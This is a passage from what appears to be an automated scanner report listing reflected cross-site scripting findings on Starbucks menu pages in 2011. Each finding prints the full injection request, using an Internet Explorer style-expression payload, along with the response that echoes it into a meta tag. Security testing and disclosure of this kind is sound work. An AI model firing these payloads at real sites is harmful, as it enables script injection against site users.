Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:32 GMT
Connection: close
Content-Length: 45231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme?30dfa"style="x:expression(alert(1))"3f1516979fe=1"/>
...[SNIP]...

2.149. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6196e"style%3d"x%3aexpression(alert(1))"b0d39f9484b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6196e"style="x:expression(alert(1))"b0d39f9484b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee?6196e"style%3d"x%3aexpression(alert(1))"b0d39f9484b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:50 GMT
Connection: close
Content-Length: 45459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee?6196e"style="x:expression(alert(1))"b0d39f9484b=1"/>
...[SNIP]...

2.150. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7c87"style%3d"x%3aexpression(alert(1))"ae192e3c688 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b7c87"style="x:expression(alert(1))"ae192e3c688 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme?b7c87"style%3d"x%3aexpression(alert(1))"ae192e3c688=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:33 GMT
Connection: close
Content-Length: 45510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme?b7c87"style="x:expression(alert(1))"ae192e3c688=1"/>
...[SNIP]...

2.151. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea630"style%3d"x%3aexpression(alert(1))"09dc08373b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea630"style="x:expression(alert(1))"09dc08373b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee?ea630"style%3d"x%3aexpression(alert(1))"09dc08373b2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:15 GMT
Connection: close
Content-Length: 43324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee?ea630"style="x:expression(alert(1))"09dc08373b2=1"/>
...[SNIP]...

2.152. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61386"style%3d"x%3aexpression(alert(1))"1ed5d722818 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61386"style="x:expression(alert(1))"1ed5d722818 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee?61386"style%3d"x%3aexpression(alert(1))"1ed5d722818=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:08 GMT
Connection: close
Content-Length: 44974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee?61386"style="x:expression(alert(1))"1ed5d722818=1"/>
...[SNIP]...

2.153. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67e38"style%3d"x%3aexpression(alert(1))"2b26c7960fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67e38"style="x:expression(alert(1))"2b26c7960fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee?67e38"style%3d"x%3aexpression(alert(1))"2b26c7960fc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:13 GMT
Connection: close
Content-Length: 45105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee?67e38"style="x:expression(alert(1))"2b26c7960fc=1"/>
...[SNIP]...

2.154. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89ffa"style%3d"x%3aexpression(alert(1))"445beb5d76e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89ffa"style="x:expression(alert(1))"445beb5d76e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme?89ffa"style%3d"x%3aexpression(alert(1))"445beb5d76e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:57 GMT
Connection: close
Content-Length: 45546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme?89ffa"style="x:expression(alert(1))"445beb5d76e=1"/>
...[SNIP]...

2.155. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38463"style%3d"x%3aexpression(alert(1))"4a36fa03848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 38463"style="x:expression(alert(1))"4a36fa03848 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee?38463"style%3d"x%3aexpression(alert(1))"4a36fa03848=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:07 GMT
Connection: close
Content-Length: 45029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee?38463"style="x:expression(alert(1))"4a36fa03848=1"/>
...[SNIP]...

2.156. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8fd2"style%3d"x%3aexpression(alert(1))"aae7138fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8fd2"style="x:expression(alert(1))"aae7138fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage?f8fd2"style%3d"x%3aexpression(alert(1))"aae7138fd=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:38 GMT
Connection: close
Content-Length: 45195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage?f8fd2"style="x:expression(alert(1))"aae7138fd=1"/>
...[SNIP]...

2.157. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 273ef"style%3d"x%3aexpression(alert(1))"6997b4054c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 273ef"style="x:expression(alert(1))"6997b4054c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme?273ef"style%3d"x%3aexpression(alert(1))"6997b4054c9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:33 GMT
Connection: close
Content-Length: 45219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme?273ef"style="x:expression(alert(1))"6997b4054c9=1"/>
...[SNIP]...

2.158. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a811"style%3d"x%3aexpression(alert(1))"b915f0e0432 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a811"style="x:expression(alert(1))"b915f0e0432 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee?2a811"style%3d"x%3aexpression(alert(1))"b915f0e0432=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:09 GMT
Connection: close
Content-Length: 45446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee?2a811"style="x:expression(alert(1))"b915f0e0432=1"/>
...[SNIP]...

2.159. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68dcf"style%3d"x%3aexpression(alert(1))"65b8aeb2cb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68dcf"style="x:expression(alert(1))"65b8aeb2cb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee?68dcf"style%3d"x%3aexpression(alert(1))"65b8aeb2cb6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:12 GMT
Connection: close
Content-Length: 45045

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee?68dcf"style="x:expression(alert(1))"65b8aeb2cb6=1"/>
...[SNIP]...

2.160. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed35a"style%3d"x%3aexpression(alert(1))"d1c3ede59d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed35a"style="x:expression(alert(1))"d1c3ede59d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee?ed35a"style%3d"x%3aexpression(alert(1))"d1c3ede59d9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:35:17 GMT
Connection: close
Content-Length: 45258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee?ed35a"style="x:expression(alert(1))"d1c3ede59d9=1"/>
...[SNIP]...

2.161. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cec96"style%3d"x%3aexpression(alert(1))"349c64eee81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cec96"style="x:expression(alert(1))"349c64eee81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee?cec96"style%3d"x%3aexpression(alert(1))"349c64eee81=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
